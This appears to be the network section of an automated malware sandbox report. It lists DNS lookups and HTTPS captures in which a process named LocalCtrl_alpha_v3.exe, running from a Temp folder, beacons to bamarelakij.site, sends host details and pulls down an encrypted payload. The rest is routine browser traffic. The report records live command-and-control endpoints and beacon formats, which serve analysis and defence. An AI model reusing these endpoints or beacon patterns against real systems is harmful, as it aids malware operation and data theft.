                                                                                                                                                                  Jan 6, 2025 23:17:56.730493069 CET1.1.1.1192.168.2.40x9738No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:17:56.731652975 CET1.1.1.1192.168.2.40x984fNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:17:58.832508087 CET1.1.1.1192.168.2.40xfbaeNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:17:58.832669020 CET1.1.1.1192.168.2.40x48dbNo error (0)bzib.nelreports.netbzib.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.063731909 CET1.1.1.1192.168.2.40x81f6No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.063884020 CET1.1.1.1192.168.2.40x3d0bNo error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.063884020 CET1.1.1.1192.168.2.40x3d0bNo error (0)googlehosted.l.googleusercontent.com142.250.185.65A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.488400936 CET1.1.1.1192.168.2.40x535bNo error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.488400936 CET1.1.1.1192.168.2.40x535bNo error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.488400936 CET1.1.1.1192.168.2.40x535bNo error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.488400936 CET1.1.1.1192.168.2.40x535bNo error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.497988939 CET1.1.1.1192.168.2.40x5186No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.498586893 CET1.1.1.1192.168.2.40x5244No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.504774094 CET1.1.1.1192.168.2.40x3acdNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.505089045 CET1.1.1.1192.168.2.40x2769No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.513406992 CET1.1.1.1192.168.2.40x99d1No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:00.513418913 CET1.1.1.1192.168.2.40x56aeNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.614773989 CET1.1.1.1192.168.2.40x2f77No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.614773989 CET1.1.1.1192.168.2.40x2f77No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.615962982 CET1.1.1.1192.168.2.40x5888No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.616878986 CET1.1.1.1192.168.2.40xd03No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.616931915 CET1.1.1.1192.168.2.40xea62No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.616931915 CET1.1.1.1192.168.2.40xea62No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.714605093 CET1.1.1.1192.168.2.40x6389No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.714766026 CET1.1.1.1192.168.2.40xbfNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:01.714766026 CET1.1.1.1192.168.2.40xbfNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:02.028836012 CET1.1.1.1192.168.2.40x43a3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Jan 6, 2025 23:18:02.028836012 CET1.1.1.1192.168.2.40x43a3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                                  • bamarelakij.site
                                                                                                                                                                  • clients2.googleusercontent.com
                                                                                                                                                                  • chrome.cloudflare-dns.com
                                                                                                                                                                  • https:
                                                                                                                                                                    • sb.scorecardresearch.com
                                                                                                                                                                    • browser.events.data.msn.com
                                                                                                                                                                    • c.msn.com
                                                                                                                                                                  • deff.nelreports.net
                                                                                                                                                                  • bzib.nelreports.net

                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.449850104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:17:48 UTC352OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  Content-Length: 147
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:17:48 UTC147OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 f0 ae ad cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzd$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                                                                                                                                  2025-01-06 22:17:49 UTC840INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:17:49 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZmBUvSZ%2FlhqlRfCn8Pkhm8tmpgZuQhBSR%2BN6Nhzr9z7JP8zXme5tIngbwPEQW4H0IRtawuBnjlwzLunjPODqsBE6T7HdMXE5cBBf6SzXeVzPJNaweRVnVTInHNSo19Bj57Y"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf14901ba31871-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=7&recv=9&lost=0&retrans=1&sent_bytes=4218&recv_bytes=1135&delivery_rate=262471&cwnd=187&unsent_bytes=0&cid=f18ab5ba2c3ebcc5&ts=681&x=0"
                                                                                                                                                                  2025-01-06 22:17:49 UTC17INData Raw: 63 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 0d 0a
                                                                                                                                                                  Data Ascii: c
                                                                                                                                                                  2025-01-06 22:17:49 UTC1369INData Raw: 33 32 65 36 0d 0a e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec 08 76 59 94 00 65 9b b6 a7 b7 51 c9
                                                                                                                                                                  Data Ascii: 32e66zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6, vYeQ
                                                                                                                                                                  2025-01-06 22:17:49 UTC1369INData Raw: a4 37 32 b2 3c b2 32 22 21 2e b1 34 39 b7 b6 b2 96 b2 3c 3a b2 37 b9 b4 b7 37 af b3 b7 35 34 b1 32 b3 b1 38 31 38 33 b4 b3 b1 b0 b2 35 38 33 34 33 b2 b3 b2 b5 32 b3 b4 31 36 b5 af 18 17 b4 37 32 b2 3c b2 32 32 31 17 36 b2 3b b2 36 32 31 01 00 ee 0c 76 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 76 0a 65 9b b6 a7 b7 51 c9 59 05 08 00 3a 06 a4 0e 13 00 ec 0e 16 11 02 ec 08 73 59 a4 0e 65 9b b6 a7 b7 51 c9 59 b9 b2 3a 3a b4 37 b3 b9 0d 00 e8 0c c1 02 13 00 ec 0e 16 11 02 ec 08 76 59 c1 02 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 08 00 8a 03 eb 0b 13 00 ec 0e 16 11 02 ec 08 72 59 eb 0b 65 9b b6 a7 b7 51 c9 59 3a 3c 34 b4 37 3a b9 15 04 00 c7 0d 8c 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 8c 0e 9e 1e b5 b8 6b 3b 7a 8b 04 00 cb 0a e2 03 0f 00 e4 0e 16
                                                                                                                                                                  Data Ascii: 72<2"!.49<:7754281835834321672<2216;621vYveQY:sYeQY::7vYeQY&6:9rYeQY:<47:4Yk;z
                                                                                                                                                                  2025-01-06 22:17:49 UTC1369INData Raw: 02 ec 08 76 59 fc 04 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 21 00 7f 04 05 0e 13 00 ec 0e 16 11 02 ec 08 34 59 05 0e 65 9b b6 a7 b7 51 c9 59 a7 ba 3a 36 b7 b7 b5 19 18 98 1b 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 08 00 dc 03 6b 04 13 00 eb 0e 16 11 02 eb 08 9a 59 6b 04 fa 7c d0 f1 1d 72 d0 75 0b e2 4f 96 21 41 96 86 04 00 93 0c f6 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 f6 0a 7b 34 35 38 8b 11 fa 0b 08 00 e1 06 36 03 13 00 eb 0e 16 11 02 eb 08 76 59 36 03 48 be bd a0 fa 4e 2a 71 b8 20 22 c7 c6 7d 6c 82 04 00 77 0e a6 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 a6 0c de 2d 81 4c 2f 08 4e 7f 19 00 c1 01 65 06 13 00 ec 0e 16 11 02 ec 08 73 59 65 06 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a1 b0
                                                                                                                                                                  Data Ascii: vYeQY8936!4YeQY:6.88":.&6.:6kYk|ruO!ArY{4586vY6HN*q "}lwrY-L/NesYeeQY79."92.
                                                                                                                                                                  2025-01-06 22:17:49 UTC1369INData Raw: 0f 00 e4 0e 16 11 02 e4 04 34 59 4c 09 70 89 a2 0d 81 ac 6d 3e 09 00 cc 05 88 07 13 00 ec 0e 16 11 02 ec 08 34 59 88 07 65 9b b6 a7 b7 51 c9 59 a4 37 32 b2 3c b2 32 22 21 0a 00 37 04 08 0e 13 00 ec 0e 16 11 02 ec 08 76 59 08 0e 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 0b 00 ef 03 72 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 72 0f 65 9b b6 a7 b7 51 c9 59 15 b9 3a b2 b0 b6 15 17 b2 3c b2 11 00 fd 0b 46 03 13 00 ec 0e 16 11 02 ec 08 9a 59 46 03 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 2a b4 b3 b2 39 2b 27 a1 11 00 9a 05 08 07 13 00 ec 0e 16 11 02 ec 08 76 59 08 07 65 9b b6 a7 b7 51 c9 59 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 08 00 74 0f fb 05 13 00 eb 0e 16 11 02 eb 08 34 59 fb 05 00 ab 5b 92 bc 4e 15 2c f5 35 c4 f5 80 7d 53 df
                                                                                                                                                                  Data Ascii: 4YLpm>4YeQY72<2"!7vYeQY2<r>YreQY:<FYFeQY#*).*9+'vYeQY49199t4Y[N,5}S
                                                                                                                                                                  2025-01-06 22:17:49 UTC1369INData Raw: 02 ec 08 ed 59 98 04 65 9b b6 a7 b7 51 c9 59 15 17 39 32 38 04 00 f5 0e e9 0a 0f 00 e4 0e 16 11 02 e4 04 76 59 e9 0a 2c 36 e8 17 dc f2 d2 21 0b 00 96 04 66 0e 13 00 ec 0e 16 11 02 ec 08 ed 59 66 0e 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 17 b2 3c b2 08 00 1b 0f 85 0c 13 00 eb 0e 16 11 02 eb 08 d8 59 85 0c 42 e9 cd 96 64 55 b8 e2 b3 77 52 f1 58 66 fe 11 06 00 23 01 93 0f 13 00 ec 0e 16 11 02 ec 08 72 59 93 0f 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 04 00 fa 05 f8 04 0f 00 e4 0e 16 11 02 e4 04 61 59 f8 04 84 f8 45 7e 75 dd 8a 4d 08 00 68 0c ae 06 13 00 ec 0e 16 11 02 ec 08 5b 59 ae 06 65 9b b6 a7 b7 51 c9 59 28 b0 b9 b9 bb b7 39 32 04 00 31 0c 76 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0f 71 a1 31 f5 80 84 fe c6 07 00 b1 04 2e 08 13 00 ec 0e 16 11 02
                                                                                                                                                                  Data Ascii: YeQY928vY,6!fYfeQY7"<YBdUwRXf#rYeQY99aYE~uMh[YeQY(921v4Yvq1.
                                                                                                                                                                  2025-01-06 22:17:49 UTC1369INData Raw: 11 02 ec 08 34 59 33 0c 65 9b b6 a7 b7 51 c9 59 15 17 b9 b8 36 b4 3a b2 04 00 51 0a e1 09 0f 00 e4 0e 16 11 02 e4 04 73 59 e1 09 df f9 2c 2e 2f d8 e3 1d 04 00 71 0e b1 02 0f 00 e4 0e 16 11 02 e4 04 72 59 b1 02 45 2f 34 7f b7 0a fb 4c 06 00 91 0e f5 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 f5 0b 65 9b b6 a7 b7 51 c9 59 2b b4 b2 bb b2 39 08 00 d8 0c 5a 0f 13 00 eb 0e 16 11 02 eb 08 9a 59 5a 0f c4 f8 d0 16 6d 6a 27 5c 35 66 4f 71 51 59 61 af 04 00 a2 0c 14 09 0f 00 e4 0e 16 11 02 e4 04 72 59 14 09 06 73 70 1d f6 b7 4a 2b 05 00 62 0f 01 01 13 00 ec 0e 16 11 02 ec 08 76 59 01 01 65 9b b6 a7 b7 51 c9 59 15 17 36 32 31 25 00 40 0e b7 04 13 00 ec 0e 16 11 02 ec 08 76 59 b7 04 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a2 32 b3 b2 2e a0 38 38 36 b4 b1 b0 3a
                                                                                                                                                                  Data Ascii: 4Y3eQY6:QsY,./qrYE/4LYeQY+9ZYZmj'\5fOqQYarYspJ+bvYeQY621%@vYeQY93:.2.886:
                                                                                                                                                                  2025-01-06 22:17:49 UTC1369INData Raw: 02 ec 08 34 59 d1 05 65 9b b6 a7 b7 51 c9 59 24 b4 b9 3a b7 39 bc 04 00 d2 0b 8a 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 8a 0a 34 5e 90 bc c4 7b 5f 8f 08 00 a7 05 04 0f 13 00 eb 0e 16 11 02 eb 08 76 59 04 0f 95 12 0b 84 ba 02 75 3e b8 89 94 e3 86 31 33 cd 04 00 f5 03 34 05 0f 00 e4 0e 16 11 02 e4 04 72 59 34 05 69 42 1a 51 99 67 d5 62 08 00 25 07 5d 0e 13 00 eb 0e 16 11 02 eb 08 34 59 5d 0e 6a 12 61 4e 88 ae 7f b6 9b 8c fe 29 b4 9d 39 45 08 00 1e 03 e9 09 13 00 eb 0e 16 11 02 eb 08 9a 59 e9 09 dd d5 39 9b bd 27 28 fd 2c 4b a6 fc 81 14 6e 0e 04 00 10 07 74 0b 0f 00 e4 0e 16 11 02 e4 04 72 59 74 0b e6 76 8b fb 16 53 44 c8 04 00 c8 01 9f 01 0f 00 e4 0e 16 11 02 e4 04 72 59 9f 01 c7 17 73 5c 36 32 bc 6f 08 00 11 04 ce 00 13 00 eb 0e 16 11 02 eb 08 34 59 ce 00 be
                                                                                                                                                                  Data Ascii: 4YeQY$:9rY4^{_vYu>134rY4iBQgb%]4Y]jaN)9EY9'(,KntrYtvSDrYs\62o4Y
                                                                                                                                                                  2025-01-06 22:17:49 UTC1369INData Raw: 00 ec 0e 16 11 02 ec 08 34 59 04 03 65 9b b6 a7 b7 51 c9 59 a6 b4 b1 39 b7 b9 b7 33 3a 2e a7 ba 3a 36 b7 b7 b5 04 00 be 0b e8 09 0f 00 e4 0e 16 11 02 e4 04 76 59 e8 09 f8 a5 d3 7c 08 61 e9 4a 1d 00 66 09 02 08 13 00 ec 0e 16 11 02 ec 08 73 59 02 08 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a9 3a b0 31 36 b2 2e b5 b2 bc 04 00 47 06 a0 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 a0 0f a5 f3 2d 12 54 d6 e2 21 04 00 ed 03 21 0f 0f 00 e4 0e 16 11 02 e4 04 72 59 21 0f f2 f7 51 80 02 d6 9e b3 24 00 51 0b 4f 0a 13 00 ec 0e 16 11 02 ec 08 76 59 4f 0a 65 9b b6 a7 b7 51 c9 59 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 05 00 dd 0a f6 07 13 00 ec 0e 16 11 02 ec 08 34 59 f6
                                                                                                                                                                  Data Ascii: 4YeQY93:.:6vY|aJfsYeQY79."92.:16.G4Y-T!!rY!Q$QOvYOeQY6.49.886:7.49<4Y


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.449861104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:17:50 UTC453OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 53
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:17:50 UTC53OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii:
                                                                                                                                                                  2025-01-06 22:17:50 UTC740INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:17:50 GMT
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W1YyK2HntqFmvmnCC6cWG7kXxZTbzRC7mZ92icR3APgVbrjTyHemab1rLr48U93dvTPHZWFUjBHnPS9GP3B3x37XQQ9eLG4gvov5Dm2DWIPGAV3fHLKFw67b5u52Jq2Wycdg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf1498985c42ad-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1586&min_rtt=1577&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1142&delivery_rate=1765417&cwnd=242&unsent_bytes=0&cid=6cec9836a25bb5d9&ts=342&x=0"
                                                                                                                                                                  2025-01-06 22:17:50 UTC24INData Raw: 31 32 0d 0a 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a
                                                                                                                                                                  Data Ascii: 12
                                                                                                                                                                  2025-01-06 22:17:50 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.449872104.21.80.524438032C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:17:51 UTC454OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Accept: */*
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                                  fileid: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  Content-Length: 208
                                                                                                                                                                  Host: bamarelakij.site
                                                                                                                                                                  2025-01-06 22:17:51 UTC208OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 b5 05 3d 2c 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                  Data Ascii: R=,@5YI`H1(((
                                                                                                                                                                  2025-01-06 22:17:51 UTC819INHTTP/1.1 204 No Content
                                                                                                                                                                  Date: Mon, 06 Jan 2025 22:17:51 GMT
                                                                                                                                                                  Connection: close
                                                                                                                                                                  v: WvVyAEU7h1o5pQ/sPD3fudCc+l9AjTeqTFa45XBO42qHFaZrRJTP5s77qw1VnGKRiHJ/sN0BK7PCCUZLQ0iNF+4apPM/
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hnNLN6PcZN7zQJPN6j4EbgbNWQ8DEHTsuHoKQn0SLWAReqkTW5tOUAdJSS3zyRhlXLI2TPgxbA%2Feeu4CEHWF9eDKFPgWCLydUWVf8OGzRIn8EpYnLLNdCYuFwwoYZZYOsQTe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 8fdf14a098a04396-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2117&min_rtt=1831&rtt_var=891&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1298&delivery_rate=1594756&cwnd=252&unsent_bytes=0&cid=3d4a66b37cd7798f&ts=321&x=0"


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.2.449928142.250.185.654435664C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-06 22:18:00 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                  2025-01-06 22:18:01 UTC570INHTTP/1.1 200 OK
                                                                                                                                                                  X-GUploader-UploadID: AFiumC7rClyv0uz6BrFUmf-ryDJI3ZRKl1kGz2pVkOiQg2vAV76vun2MdAynDRNovH8g-GGQGjK7DYQ
                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                  Date: Mon, 06 Jan 2025 15:58:13 GMT
                                                                                                                                                                  Expires: Tue, 06 Jan 2026 15:58:13 GMT
                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                  Age: 22787
